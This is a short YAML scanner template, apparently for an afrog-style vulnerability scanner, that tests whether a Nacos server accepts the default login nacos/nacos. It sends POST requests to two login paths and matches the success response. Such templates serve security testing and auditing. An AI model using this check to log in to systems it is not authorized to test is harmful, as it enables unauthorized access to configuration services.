id: nacos-default-password

info:
  name: Nacos Default Password
  author: zan8in
  severity: high
  verified: true

rules:
  r0:
    request:
      method: POST
      path: /v1/auth/users/login
      body: username=nacos&password=nacos
    expression: response.status == 200 && response.body.bcontains(b'"username":')  && response.body.bcontains(b'"nacos"')
  r1:
    request:
      method: POST
      path: /nacos/v1/auth/users/login
      body: username=nacos&password=nacos
    expression: response.status == 200 && response.body.bcontains(b'"username":')  && response.body.bcontains(b'"nacos"')
expression: r0() || r1()